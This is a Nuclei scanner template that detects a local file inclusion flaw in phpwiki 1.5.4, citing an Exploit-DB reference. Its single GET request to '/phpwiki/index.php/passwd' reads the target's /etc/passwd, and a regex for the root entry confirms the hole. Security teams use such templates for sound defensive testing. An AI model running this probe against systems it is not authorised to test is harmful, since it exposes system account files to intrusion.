nuclei-templates/http/vulnerabilities/other/phpwiki-lfi.yaml

28 lines
710 B
YAML

id: phpwiki-lfi
info:
name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion
author: 0x_Akoko
severity: high
description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
reference:
- https://www.exploit-db.com/exploits/38027
metadata:
max-request: 1
tags: xss,edb,phpwiki,lfi
http:
- method: GET
path:
- "{{BaseURL}}/phpwiki/index.php/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200